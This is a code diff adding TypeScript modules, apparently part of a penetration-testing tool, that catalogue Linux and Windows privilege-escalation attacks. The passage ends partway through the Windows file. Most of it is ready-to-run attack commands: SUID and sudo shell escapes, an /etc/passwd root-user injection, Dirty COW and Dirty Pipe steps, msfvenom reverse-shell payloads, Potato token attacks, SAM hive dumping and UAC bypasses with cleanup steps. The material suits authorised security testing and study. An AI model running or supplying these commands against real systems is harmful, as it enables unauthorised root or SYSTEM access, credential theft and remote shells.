@@ -0,0 +1,620 @@
+/**
+ * @fileoverview Linux Privilege Escalation Guidance
+ *
+ * Provides guidance for identifying and understanding Linux privilege
+ * escalation vectors including SUID, sudo, capabilities, cron, kernel,
+ * and service-based escalation paths.
+ *
+ * @module pentest/postexploit/privesc/linux
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Linux privilege escalation guidance namespace.
+ */
+export namespace LinuxPrivesc {
+  /**
+   * GTFOBins base URL.
+   */
+  const GTFOBINS_BASE = "https://gtfobins.github.io/gtfobins"
+
+  /**
+   * Common SUID binaries with known privilege escalation potential.
+   */
+  export const SUID_PRIVESC_BINARIES: Record<string, {
+    technique: string
+    commands: string[]
+    gtfobins: string
+  }> = {
+    bash: {
+      technique: "Direct shell spawn",
+      commands: ["bash -p"],
+      gtfobins: `${GTFOBINS_BASE}/bash/#suid`,
+    },
+    sh: {
+      technique: "Direct shell spawn",
+      commands: ["sh -p"],
+      gtfobins: `${GTFOBINS_BASE}/sh/#suid`,
+    },
+    python: {
+      technique: "Python shell spawn",
+      commands: ['python -c \'import os; os.execl("/bin/sh", "sh", "-p")\''],
+      gtfobins: `${GTFOBINS_BASE}/python/#suid`,
+    },
+    python3: {
+      technique: "Python3 shell spawn",
+      commands: ['python3 -c \'import os; os.execl("/bin/sh", "sh", "-p")\''],
+      gtfobins: `${GTFOBINS_BASE}/python/#suid`,
+    },
+    perl: {
+      technique: "Perl shell spawn",
+      commands: ['perl -e \'exec "/bin/sh";\''],
+      gtfobins: `${GTFOBINS_BASE}/perl/#suid`,
+    },
+    ruby: {
+      technique: "Ruby shell spawn",
+      commands: ['ruby -e \'exec "/bin/sh"\''],
+      gtfobins: `${GTFOBINS_BASE}/ruby/#suid`,
+    },
+    php: {
+      technique: "PHP shell spawn",
+      commands: ['php -r "pcntl_exec(\'/bin/sh\', [\'-p\']);"'],
+      gtfobins: `${GTFOBINS_BASE}/php/#suid`,
+    },
+    vim: {
+      technique: "Vim shell escape",
+      commands: ["vim -c ':!/bin/sh'"],
+      gtfobins: `${GTFOBINS_BASE}/vim/#suid`,
+    },
+    vi: {
+      technique: "Vi shell escape",
+      commands: ["vi -c ':!/bin/sh'"],
+      gtfobins: `${GTFOBINS_BASE}/vi/#suid`,
+    },
+    less: {
+      technique: "Less shell escape",
+      commands: ["less /etc/passwd", "!/bin/sh"],
+      gtfobins: `${GTFOBINS_BASE}/less/#suid`,
+    },
+    more: {
+      technique: "More shell escape",
+      commands: ["more /etc/passwd", "!/bin/sh"],
+      gtfobins: `${GTFOBINS_BASE}/more/#suid`,
+    },
+    find: {
+      technique: "Find exec",
+      commands: ["find . -exec /bin/sh -p \\; -quit"],
+      gtfobins: `${GTFOBINS_BASE}/find/#suid`,
+    },
+    nmap: {
+      technique: "Nmap interactive mode (old versions)",
+      commands: ["nmap --interactive", "!sh"],
+      gtfobins: `${GTFOBINS_BASE}/nmap/#suid`,
+    },
+    awk: {
+      technique: "AWK system call",
+      commands: ["awk 'BEGIN {system(\"/bin/sh\")}'"],
+      gtfobins: `${GTFOBINS_BASE}/awk/#suid`,
+    },
+    env: {
+      technique: "Env shell spawn",
+      commands: ["env /bin/sh -p"],
+      gtfobins: `${GTFOBINS_BASE}/env/#suid`,
+    },
+    cp: {
+      technique: "Copy /etc/passwd overwrite",
+      commands: [
+        "# Create modified passwd with root shell",
+        "cp /etc/passwd /tmp/passwd",
+        "echo 'root2:$(openssl passwd -1 password):0:0:root:/root:/bin/bash' >> /tmp/passwd",
+        "cp /tmp/passwd /etc/passwd",
+      ],
+      gtfobins: `${GTFOBINS_BASE}/cp/#suid`,
+    },
+    tar: {
+      technique: "Tar checkpoint action",
+      commands: [
+        'tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh',
+      ],
+      gtfobins: `${GTFOBINS_BASE}/tar/#suid`,
+    },
+    docker: {
+      technique: "Docker privilege escalation",
+      commands: ["docker run -v /:/mnt --rm -it alpine chroot /mnt sh"],
+      gtfobins: `${GTFOBINS_BASE}/docker/#suid`,
+    },
+  }
+
+  /**
+   * Sudo misconfigurations with exploitation guidance.
+   */
+  export const SUDO_EXPLOITS: Record<string, {
+    technique: string
+    commands: string[]
+    gtfobins?: string
+  }> = {
+    ALL: {
+      technique: "Full sudo access",
+      commands: ["sudo su -", "sudo /bin/bash"],
+    },
+    vim: {
+      technique: "Vim shell escape",
+      commands: ["sudo vim -c ':!/bin/bash'"],
+      gtfobins: `${GTFOBINS_BASE}/vim/#sudo`,
+    },
+    less: {
+      technique: "Less shell escape",
+      commands: ["sudo less /etc/passwd", "!/bin/bash"],
+      gtfobins: `${GTFOBINS_BASE}/less/#sudo`,
+    },
+    find: {
+      technique: "Find exec",
+      commands: ["sudo find . -exec /bin/bash \\; -quit"],
+      gtfobins: `${GTFOBINS_BASE}/find/#sudo`,
+    },
+    awk: {
+      technique: "AWK system call",
+      commands: ["sudo awk 'BEGIN {system(\"/bin/bash\")}'"],
+      gtfobins: `${GTFOBINS_BASE}/awk/#sudo`,
+    },
+    nmap: {
+      technique: "Nmap script",
+      commands: [
+        "TF=$(mktemp)",
+        "echo 'os.execute(\"/bin/bash\")' > $TF",
+        "sudo nmap --script=$TF",
+      ],
+      gtfobins: `${GTFOBINS_BASE}/nmap/#sudo`,
+    },
+    env: {
+      technique: "Env preserving",
+      commands: ["sudo env /bin/bash"],
+      gtfobins: `${GTFOBINS_BASE}/env/#sudo`,
+    },
+    perl: {
+      technique: "Perl exec",
+      commands: ['sudo perl -e \'exec "/bin/bash";\''],
+      gtfobins: `${GTFOBINS_BASE}/perl/#sudo`,
+    },
+    python: {
+      technique: "Python shell",
+      commands: ['sudo python -c \'import os; os.system("/bin/bash")\''],
+      gtfobins: `${GTFOBINS_BASE}/python/#sudo`,
+    },
+    ruby: {
+      technique: "Ruby exec",
+      commands: ['sudo ruby -e \'exec "/bin/bash"\''],
+      gtfobins: `${GTFOBINS_BASE}/ruby/#sudo`,
+    },
+    ftp: {
+      technique: "FTP shell escape",
+      commands: ["sudo ftp", "!/bin/bash"],
+      gtfobins: `${GTFOBINS_BASE}/ftp/#sudo`,
+    },
+    man: {
+      technique: "Man shell escape",
+      commands: ["sudo man man", "!/bin/bash"],
+      gtfobins: `${GTFOBINS_BASE}/man/#sudo`,
+    },
+    zip: {
+      technique: "Zip unzip trick",
+      commands: [
+        "TF=$(mktemp -u)",
+        "sudo zip $TF /etc/hosts -T -TT 'sh #'",
+      ],
+      gtfobins: `${GTFOBINS_BASE}/zip/#sudo`,
+    },
+    tar: {
+      technique: "Tar checkpoint",
+      commands: [
+        'sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash',
+      ],
+      gtfobins: `${GTFOBINS_BASE}/tar/#sudo`,
+    },
+    git: {
+      technique: "Git pager",
+      commands: ["sudo git -p help config", "!/bin/bash"],
+      gtfobins: `${GTFOBINS_BASE}/git/#sudo`,
+    },
+    systemctl: {
+      technique: "Systemctl pager",
+      commands: ["sudo systemctl", "!sh"],
+      gtfobins: `${GTFOBINS_BASE}/systemctl/#sudo`,
+    },
+    journalctl: {
+      technique: "Journalctl pager",
+      commands: ["sudo journalctl", "!/bin/bash"],
+      gtfobins: `${GTFOBINS_BASE}/journalctl/#sudo`,
+    },
+  }
+
+  /**
+   * Linux capabilities with privilege escalation potential.
+   */
+  export const CAPABILITY_EXPLOITS: Record<string, {
+    capability: string
+    technique: string
+    commands: string[]
+  }> = {
+    "cap_setuid+ep": {
+      capability: "CAP_SETUID",
+      technique: "Set UID to root",
+      commands: [
+        "# If python has cap_setuid:",
+        'python -c \'import os; os.setuid(0); os.system("/bin/bash")\'',
+      ],
+    },
+    "cap_dac_read_search+ep": {
+      capability: "CAP_DAC_READ_SEARCH",
+      technique: "Read any file",
+      commands: [
+        "# Read shadow file:",
+        "./binary_with_cap /etc/shadow",
+      ],
+    },
+    "cap_dac_override+ep": {
+      capability: "CAP_DAC_OVERRIDE",
+      technique: "Write any file",
+      commands: [
+        "# Write to /etc/passwd or /etc/shadow",
+      ],
+    },
+    "cap_net_raw+ep": {
+      capability: "CAP_NET_RAW",
+      technique: "Network sniffing/injection",
+      commands: [
+        "# Capture network traffic",
+        "tcpdump -i eth0",
+      ],
+    },
+    "cap_sys_admin+ep": {
+      capability: "CAP_SYS_ADMIN",
+      technique: "Mount/umount filesystems, container escape",
+      commands: [
+        "# Mount host filesystem in container",
+        "mount /dev/sda1 /mnt",
+      ],
+    },
+    "cap_sys_ptrace+ep": {
+      capability: "CAP_SYS_PTRACE",
+      technique: "Process injection",
+      commands: [
+        "# Inject into root process",
+        "# Use gdb or ptrace to inject shellcode",
+      ],
+    },
+  }
+
+  /**
+   * Generate SUID discovery commands.
+   */
+  export function getSUIDDiscoveryCommands(): string[] {
+    return [
+      "# Find all SUID binaries",
+      "find / -perm -u=s -type f 2>/dev/null",
+      "",
+      "# Find SUID binaries owned by root",
+      "find / -user root -perm -4000 -print 2>/dev/null",
+      "",
+      "# Find SUID/SGID binaries",
+      "find / -perm -g=s -o -perm -u=s -type f 2>/dev/null",
+      "",
+      "# Check for unusual SUID binaries",
+      "find / -perm -4000 -type f -exec ls -la {} \\; 2>/dev/null | grep -v '/usr/bin\\|/usr/sbin\\|/bin\\|/sbin'",
+    ]
+  }
+
+  /**
+   * Generate sudo enumeration commands.
+   */
+  export function getSudoEnumerationCommands(): string[] {
+    return [
+      "# Check sudo version (for CVE checking)",
+      "sudo --version",
+      "",
+      "# List sudo privileges",
+      "sudo -l",
+      "",
+      "# Check sudoers file (if readable)",
+      "cat /etc/sudoers 2>/dev/null",
+      "cat /etc/sudoers.d/* 2>/dev/null",
+      "",
+      "# Check for sudo without password entries",
+      "grep -i 'NOPASSWD' /etc/sudoers /etc/sudoers.d/* 2>/dev/null",
+    ]
+  }
+
+  /**
+   * Generate capabilities discovery commands.
+   */
+  export function getCapabilitiesDiscoveryCommands(): string[] {
+    return [
+      "# Find binaries with capabilities",
+      "getcap -r / 2>/dev/null",
+      "",
+      "# Alternative using find",
+      "find / -type f -exec getcap {} \\; 2>/dev/null | grep -v 'Failed\\|getcap'",
+    ]
+  }
+
+  /**
+   * Generate cron enumeration commands.
+   */
+  export function getCronEnumerationCommands(): string[] {
+    return [
+      "# List all cron jobs",
+      "cat /etc/crontab",
+      "ls -la /etc/cron.*",
+      "ls -la /var/spool/cron/",
+      "ls -la /var/spool/cron/crontabs/",
+      "",
+      "# Check for writable cron directories",
+      "find /etc/cron* -type f -writable 2>/dev/null",
+      "",
+      "# Check for world-writable scripts in cron",
+      "for f in $(cat /etc/crontab | grep -v '^#' | awk '{print $NF}' | grep '^/'); do ls -la $f 2>/dev/null; done",
+      "",
+      "# Monitor cron jobs",
+      "# Using pspy or watching /proc",
+    ]
+  }
+
+  /**
+   * Generate kernel exploit enumeration commands.
+   */
+  export function getKernelEnumerationCommands(): string[] {
+    return [
+      "# Get kernel version",
+      "uname -a",
+      "cat /proc/version",
+      "",
+      "# Get distribution info",
+      "cat /etc/*-release",
+      "lsb_release -a 2>/dev/null",
+      "",
+      "# Check for known vulnerable kernels:",
+      "# - Dirty COW (CVE-2016-5195): Linux < 4.8.3",
+      "# - Dirty Pipe (CVE-2022-0847): Linux 5.8+",
+      "# - OverlayFS (CVE-2021-3493): Linux 4.19+",
+      "# - GameOver(lay) (CVE-2023-2640): Ubuntu kernels",
+      "",
+      "# Check loaded modules",
+      "lsmod",
+      "",
+      "# Check if KASLR is enabled",
+      "cat /proc/sys/kernel/randomize_va_space",
+    ]
+  }
+
+  /**
+   * Generate writable path enumeration commands.
+   */
+  export function getWritablePathCommands(): string[] {
+    return [
+      "# Find world-writable directories in PATH",
+      'echo $PATH | tr ":" "\\n" | xargs -I {} find {} -type d -writable 2>/dev/null',
+      "",
+      "# Find writable files in common directories",
+      "find /etc -type f -writable 2>/dev/null",
+      "find /usr -type f -writable 2>/dev/null",
+      "",
+      "# Check for writable /etc/passwd",
+      "ls -la /etc/passwd",
+      "",
+      "# Check for writable /etc/shadow (rare)",
+      "ls -la /etc/shadow",
+    ]
+  }
+
+  /**
+   * Analyze a SUID binary and return exploitation guidance.
+   */
+  export function analyzeSUIDBinary(
+    binary: string,
+    path: string
+  ): PostExploitTypes.PrivescVector | null {
+    const binaryName = binary.toLowerCase()
+    const exploit = SUID_PRIVESC_BINARIES[binaryName]
+
+    if (!exploit) {
+      return null
+    }
+
+    return {
+      id: `suid_${binaryName}_${Date.now()}`,
+      category: "suid",
+      platform: "linux",
+      name: `SUID ${binary}`,
+      description: `SUID binary ${path} can be exploited for privilege escalation`,
+      risk: "high",
+      exploitability: "easy",
+      target: path,
+      technique: exploit.technique,
+      commands: exploit.commands,
+      prerequisites: ["SUID bit set on binary"],
+      detectionRisk: "low",
+      gtfobins: exploit.gtfobins,
+      mitre: [PostExploitTypes.MITRE_PRIVESC.SUID],
+      discoveredAt: Date.now(),
+    }
+  }
+
+  /**
+   * Analyze sudo configuration and return exploitation guidance.
+   */
+  export function analyzeSudoRule(
+    rule: string,
+    user: string,
+    nopasswd: boolean
+  ): PostExploitTypes.PrivescVector | null {
+    // Check for ALL
+    if (rule.includes("ALL") && rule.includes("(ALL)")) {
+      return {
+        id: `sudo_all_${Date.now()}`,
+        category: "sudo",
+        platform: "linux",
+        name: "Sudo ALL Access",
+        description: `User ${user} has sudo access to ALL commands`,
+        risk: "critical",
+        exploitability: "trivial",
+        target: "sudo",
+        technique: "Direct root shell via sudo",
+        commands: ["sudo su -", "sudo /bin/bash"],
+        prerequisites: nopasswd ? [] : ["Know user password"],
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.SUDO],
+        discoveredAt: Date.now(),
+      }
+    }
+
+    // Check for specific binaries
+    for (const [binary, exploit] of Object.entries(SUDO_EXPLOITS)) {
+      if (rule.toLowerCase().includes(binary.toLowerCase())) {
+        return {
+          id: `sudo_${binary}_${Date.now()}`,
+          category: "sudo",
+          platform: "linux",
+          name: `Sudo ${binary}`,
+          description: `User ${user} can run ${binary} as root via sudo`,
+          risk: "high",
+          exploitability: "easy",
+          target: binary,
+          technique: exploit.technique,
+          commands: exploit.commands,
+          prerequisites: nopasswd ? [] : ["Know user password"],
+          detectionRisk: "medium",
+          gtfobins: exploit.gtfobins,
+          mitre: [PostExploitTypes.MITRE_PRIVESC.SUDO],
+          discoveredAt: Date.now(),
+        }
+      }
+    }
+
+    return null
+  }
+
+  /**
+   * Get kernel exploits for a specific version.
+   */
+  export function getKernelExploits(kernelVersion: string): PostExploitTypes.PrivescVector[] {
+    const vectors: PostExploitTypes.PrivescVector[] = []
+    const version = parseKernelVersion(kernelVersion)
+
+    if (!version) return vectors
+
+    // Dirty COW (CVE-2016-5195) - Linux < 4.8.3
+    if (version.major < 4 || (version.major === 4 && version.minor < 8) || (version.major === 4 && version.minor === 8 && version.patch < 3)) {
+      vectors.push({
+        id: `kernel_dirtycow_${Date.now()}`,
+        category: "kernel",
+        platform: "linux",
+        name: "Dirty COW (CVE-2016-5195)",
+        description: "Race condition in copy-on-write allows privilege escalation",
+        risk: "critical",
+        exploitability: "easy",
+        target: kernelVersion,
+        technique: "Copy-on-write race condition",
+        commands: [
+          "# Download and compile Dirty COW exploit",
+          "# Multiple variants available:",
+          "# - dirty.c (pokemon version)",
+          "# - dirtyc0w.c (original)",
+          "# - cowroot.c (creates root shell)",
+          "",
+          "# Example (cowroot):",
+          "gcc -pthread cowroot.c -o cowroot",
+          "./cowroot",
+        ],
+        prerequisites: ["Kernel version < 4.8.3", "gcc available"],
+        detectionRisk: "high",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.KERNEL],
+        notes: "CVE-2016-5195 - Very reliable exploit",
+        discoveredAt: Date.now(),
+      })
+    }
+
+    // Dirty Pipe (CVE-2022-0847) - Linux 5.8+
+    if (version.major === 5 && version.minor >= 8) {
+      vectors.push({
+        id: `kernel_dirtypipe_${Date.now()}`,
+        category: "kernel",
+        platform: "linux",
+        name: "Dirty Pipe (CVE-2022-0847)",
+        description: "Pipe buffer flag overwrite allows file modification",
+        risk: "critical",
+        exploitability: "easy",
+        target: kernelVersion,
+        technique: "Pipe buffer manipulation",
+        commands: [
+          "# Download and compile Dirty Pipe exploit",
+          "gcc exploit.c -o exploit",
+          "./exploit /etc/passwd 1 '${sed_payload}'",
+          "",
+          "# Or use pre-built PoC",
+        ],
+        prerequisites: ["Kernel version 5.8+ < patched", "gcc available"],
+        detectionRisk: "medium",
+        mitre: [PostExploitTypes.MITRE_PRIVESC.KERNEL],
+        notes: "CVE-2022-0847 - Works on many modern kernels",
+        discoveredAt: Date.now(),
+      })
+    }
+
+    return vectors
+  }
+
+  /**
+   * Parse kernel version string.
+   */
+  function parseKernelVersion(version: string): { major: number; minor: number; patch: number } | null {
+    const match = version.match(/(\d+)\.(\d+)\.(\d+)/)
+    if (!match) return null
+    return {
+      major: parseInt(match[1], 10),
+      minor: parseInt(match[2], 10),
+      patch: parseInt(match[3], 10),
+    }
+  }
+
+  /**
+   * Get all discovery commands for Linux privilege escalation.
+   */
+  export function getAllDiscoveryCommands(): Record<string, string[]> {
+    return {
+      suid: getSUIDDiscoveryCommands(),
+      sudo: getSudoEnumerationCommands(),
+      capabilities: getCapabilitiesDiscoveryCommands(),
+      cron: getCronEnumerationCommands(),
+      kernel: getKernelEnumerationCommands(),
+      writablePaths: getWritablePathCommands(),
+    }
+  }
+
+  /**
+   * Format privesc vector for display.
+   */
+  export function formatVector(vector: PostExploitTypes.PrivescVector): string {
+    const lines: string[] = []
+    lines.push(`[${vector.risk.toUpperCase()}] ${vector.name}`)
+    lines.push(`Category: ${vector.category}`)
+    lines.push(`Target: ${vector.target}`)
+    lines.push(`Description: ${vector.description}`)
+    lines.push(`Technique: ${vector.technique}`)
+    lines.push(`Exploitability: ${vector.exploitability}`)
+    lines.push(`Detection Risk: ${vector.detectionRisk}`)
+    lines.push("")
+    lines.push("Commands:")
+    for (const cmd of vector.commands) {
+      lines.push(`  ${cmd}`)
+    }
+    if (vector.gtfobins) {
+      lines.push("")
+      lines.push(`GTFOBins: ${vector.gtfobins}`)
+    }
+    lines.push("")
+    lines.push(`MITRE ATT&CK: ${vector.mitre.join(", ")}`)
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/privesc/windows.ts b/packages/opencode/src/pentest/postexploit/privesc/windows.ts
new file mode 100644
index 00000000000..1a6249d7ad2
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/privesc/windows.ts
@@ -0,0 +1,606 @@
+/**
+ * @fileoverview Windows Privilege Escalation Guidance
+ *
+ * Provides guidance for identifying and understanding Windows privilege
+ * escalation vectors including services, registry, tokens, scheduled tasks,
+ * DLL hijacking, UAC bypass, and stored credentials.
+ *
+ * @module pentest/postexploit/privesc/windows
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Windows privilege escalation guidance namespace.
+ */
+export namespace WindowsPrivesc {
+  /**
+   * LOLBAS base URL.
+   */
+  const LOLBAS_BASE = "https://lolbas-project.github.io/lolbas"
+
+  /**
+   * Windows service vulnerabilities with exploitation guidance.
+   */
+  export const SERVICE_EXPLOITS: Record<string, {
+    vulnerability: string
+    technique: string
+    commands: string[]
+    lolbas?: string
+  }> = {
+    unquoted_path: {
+      vulnerability: "Unquoted Service Path",
+      technique: "Binary planting in unquoted path spaces",
+      commands: [
+        "# Find unquoted service paths:",
+        'wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows\\\\" | findstr /i /v """',
+        "",
+        "# If path is: C:\\Program Files\\Some Service\\service.exe",
+        "# Place malicious binary at: C:\\Program.exe",
+        "",
+        "# Create payload",
+        "msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > Program.exe",
+        "",
+        "# Restart service (if possible)",
+        "sc stop <service>",
+        "sc start <service>",
+      ],
+    },
+    weak_permissions: {
+      vulnerability: "Weak Service Permissions",
+      technique: "Modify service binary path or configuration",
+      commands: [
+        "# Check service permissions with accesschk",
+        'accesschk.exe -uwcqv "Everyone" * /accepteula',
+        'accesschk.exe -uwcqv "Authenticated Users" * /accepteula',
+        'accesschk.exe -uwcqv "Users" * /accepteula',
+        "",
+        "# If SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG:",
+        "sc config <service> binpath= \"C:\\path\\to\\payload.exe\"",
+        "sc config <service> binpath= \"net localgroup administrators <user> /add\"",
+        "",
+        "# Restart service",
+        "sc stop <service>",
+        "sc start <service>",
+      ],
+    },
+    writable_path: {
+      vulnerability: "Writable Service Binary Path",
+      technique: "Replace service executable",
+      commands: [
+        "# Check binary permissions",
+        'icacls "C:\\path\\to\\service.exe"',
+        "",
+        "# If writable, backup and replace",
+        "move service.exe service.exe.bak",
+        "copy payload.exe service.exe",
+        "",
+        "# Restart service",
+        "sc stop <service>",
+        "sc start <service>",
+      ],
+    },
+    dll_hijack: {
+      vulnerability: "DLL Hijacking in Service",
+      technique: "Plant malicious DLL in service directory",
+      commands: [
+        "# Use Process Monitor to find missing DLLs",
+        "# Filter: Result contains NAME NOT FOUND",
+        "# Filter: Path ends with .dll",
+        "",
+        "# Create malicious DLL",
+        "msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > hijack.dll",
+        "",
+        "# Place in writable location that's searched",
+        "copy hijack.dll C:\\writable\\path\\missing.dll",
+      ],
+    },
+  }
+
+  /**
+   * Registry-based privilege escalation vectors.
+   */
+  export const REGISTRY_EXPLOITS: Record<string, {
+    key: string
+    technique: string
+    commands: string[]
+    risk: PostExploitTypes.Severity
+  }> = {
+    always_install_elevated: {
+      key: "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated",
+      technique: "MSI package installation with SYSTEM privileges",
+      commands: [
+        "# Check if AlwaysInstallElevated is enabled",
+        "reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated",
+        "reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated",
+        "",
+        "# If both return 1, create malicious MSI",
+        "msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > payload.msi",
+        "",
+        "# Install the MSI (runs as SYSTEM)",
+        "msiexec /quiet /qn /i payload.msi",
+      ],
+      risk: "critical",
+    },
+    autorun: {
+      key: "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
+      technique: "Persistence via autorun registry key",
+      commands: [
+        "# Check autorun keys",
+        "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
+        "reg query HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
+        "",
+        "# Check for writable binaries in autorun",
+        "# Use accesschk or icacls to check permissions",
+      ],
+      risk: "medium",
+    },
+    service_image_path: {
+      key: "HKLM\\SYSTEM\\CurrentControlSet\\Services\\<service>\\ImagePath",
+      technique: "Modify service image path",
+      commands: [
+        "# List services from registry",
+        "reg query HKLM\\SYSTEM\\CurrentControlSet\\Services",
+        "",
+        "# Check specific service",
+        "reg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\<service> /v ImagePath",
+        "",
+        "# If writable, modify ImagePath",
+        'reg add HKLM\\SYSTEM\\CurrentControlSet\\Services\\<service> /v ImagePath /t REG_EXPAND_SZ /d "C:\\path\\to\\payload.exe" /f',
+      ],
+      risk: "high",
+    },
+  }
+
+  /**
+   * Token manipulation techniques.
+   */
+  export const TOKEN_EXPLOITS: Record<string, {
+    technique: string
+    privilege: string
+    commands: string[]
+    tools: string[]
+  }> = {
+    SeImpersonatePrivilege: {
+      technique: "Token impersonation (Potato attacks)",
+      privilege: "SeImpersonatePrivilege",
+      commands: [
+        "# Check current privileges",
+        "whoami /priv",
+        "",
+        "# If SeImpersonatePrivilege is enabled:",
+        "",
+        "# JuicyPotato (Windows Server 2016/2019)",
+        "JuicyPotato.exe -l 1337 -p C:\\Windows\\System32\\cmd.exe -a \"/c C:\\path\\to\\payload.exe\" -t *",
+        "",
+        "# PrintSpoofer (Windows 10/Server 2019)",
+        "PrintSpoofer.exe -i -c cmd",
+        "",
+        "# GodPotato (Universal)",
+        "GodPotato.exe -cmd \"cmd /c whoami\"",
+        "",
+        "# SweetPotato",
+        "SweetPotato.exe -a \"whoami\"",
+      ],
+      tools: ["JuicyPotato", "PrintSpoofer", "GodPotato", "SweetPotato", "RoguePotato"],
+    },
+    SeDebugPrivilege: {
+      technique: "Debug process injection",
+      privilege: "SeDebugPrivilege",
+      commands: [
+        "# Check current privileges",
+        "whoami /priv",
+        "",
+        "# If SeDebugPrivilege is enabled:",
+        "# Can debug any process including SYSTEM processes",
+        "",
+        "# Inject into a SYSTEM process",
+        "# Use Meterpreter migrate or similar",
+      ],
+      tools: ["Meterpreter", "Process Injector"],
+    },
+    SeBackupPrivilege: {
+      technique: "Backup sensitive files (SAM, SYSTEM)",
+      privilege: "SeBackupPrivilege",
+      commands: [
+        "# Check current privileges",
+        "whoami /priv",
+        "",
+        "# If SeBackupPrivilege is enabled:",
+        "# Can backup any file ignoring DACL",
+        "",
+        "# Backup SAM and SYSTEM hives",
+        "reg save HKLM\\SAM sam.save",
+        "reg save HKLM\\SYSTEM system.save",
+        "",
+        "# Or use diskshadow for NTDS.dit",
+      ],
+      tools: ["reg", "diskshadow", "robocopy"],
+    },
+    SeRestorePrivilege: {
+      technique: "Restore files to overwrite system files",
+      privilege: "SeRestorePrivilege",
+      commands: [
+        "# Check current privileges",
+        "whoami /priv",
+        "",
+        "# If SeRestorePrivilege is enabled:",
+        "# Can write to any file ignoring DACL",
+        "",
+        "# Overwrite utilman.exe with cmd.exe",
+        "# Then trigger at login screen with Win+U",
+      ],
+      tools: ["robocopy"],
+    },
+    SeTakeOwnershipPrivilege: {
+      technique: "Take ownership of files/registry",
+      privilege: "SeTakeOwnershipPrivilege",
+      commands: [
+        "# Check current privileges",
+        "whoami /priv",
+        "",
+        "# Take ownership of a file",
+        "takeown /f C:\\path\\to\\file",
+        "",
+        "# Grant full permissions",
+        "icacls C:\\path\\to\\file /grant %username%:F",
+      ],
+      tools: ["takeown", "icacls"],
+    },
+  }
+
+  /**
+   * UAC bypass techniques.
+   */
+  export const UAC_BYPASSES: Record<string, {
+    name: string
+    technique: string
+    commands: string[]
+    windowsVersions: string[]
+  }> = {
+    fodhelper: {
+      name: "FodHelper Bypass",
+      technique: "Registry hijack with auto-elevate binary",
+      commands: [
+        "# FodHelper bypass - Works on Windows 10",
+        'reg add "HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command" /d "C:\\path\\to\\payload.exe" /f',
+        'reg add "HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command" /v DelegateExecute /t REG_SZ /f',
+        "fodhelper.exe",
+        "",
+        "# Cleanup",
+        'reg delete "HKCU\\Software\\Classes\\ms-settings" /f',
+      ],
+      windowsVersions: ["Windows 10", "Windows 11"],
+    },
+    computerDefaults: {
+      name: "ComputerDefaults Bypass",
+      technique: "Registry hijack with ComputerDefaults",
+      commands: [
+        "# ComputerDefaults bypass",
+        'reg add "HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command" /d "cmd.exe" /f',
+        'reg add "HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command" /v DelegateExecute /t REG_SZ /f',
+        "computerdefaults.exe",
+      ],
+      windowsVersions: ["Windows 10"],
+    },
+    eventvwr: {
+      name: "Event Viewer Bypass",
+      technique: "Registry hijack with eventvwr.exe",
+      commands: [
+        "# Event Viewer bypass - Windows 7/8/10",
+        'reg add "HKCU\\Software\\Classes\\mscfile\\Shell\\Open\\command" /d "C:\\path\\to\\payload.exe" /f',
+        "eventvwr.exe",
+        "",
+        "# Cleanup",
+        'reg delete "HKCU\\Software\\Classes\\mscfile" /f',
+      ],
+      windowsVersions: ["Windows 7", "Windows 8", "Windows 10"],
+    },
+    sdclt: {
+      name: "SDCLT Bypass",
+      technique: "Registry hijack with sdclt.exe",
+      commands: [
+        "# SDCLT bypass - Windows 10",
+        'reg add "HKCU\\Software\\Classes\\Folder\\Shell\\Open\\command" /d "C:\\Windows\\System32\\cmd.exe" /f',
+        'reg add "HKCU\\Software\\Classes\\Folder\\Shell\\Open\\command" /v DelegateExecute /t REG_SZ /f',
+        "sdclt.exe",
+      ],
+      windowsVersions: ["Windows 10"],
+    },
+    cmstp: {
+      name: "CMSTP Bypass",
+      technique: "INF file execution via CMSTP",
+      commands: [
+        "# CMSTP bypass",
+        "# Create malicious INF file",
+        "cmstp.exe /ni /s C:\\path\\to\\payload.inf",
+      ],
+      windowsVersions: ["Windows 7", "Windows 8", "Windows 10"],
+    },
+  }
+
+  /**
+   * Scheduled task privilege escalation vectors.
+   */
+  export const SCHEDULED_TASK_EXPLOITS = {
+    discovery: [
+      "# List all scheduled tasks",
+      "schtasks /query /fo LIST /v",
+      "",
+      "# Find tasks running as SYSTEM",
+      "schtasks /query /fo LIST /v | findstr /i \"SYSTEM\"",
+      "",
+      "# Check task files for write access",
+      "# Use icacls on the binary paths found",
+    ],
+    exploitation: [
+      "# If task binary is writable:",
+      "# Replace with payload",
+      "",
+      "# If task folder is writable:",
+      "# Place DLL for hijacking",
+      "",
+      "# Create new scheduled task (requires admin)",
+      'schtasks /create /tn "TaskName" /tr "C:\\path\\to\\payload.exe" /sc once /st 00:00 /ru SYSTEM',
+    ],
+  }
+
+  /**
+   * Generate service enumeration commands.
+   */
+  export function getServiceEnumerationCommands(): string[] {
+    return [
+      "# List all services",
+      "sc query state= all",
+      "wmic service list full",
+      "",
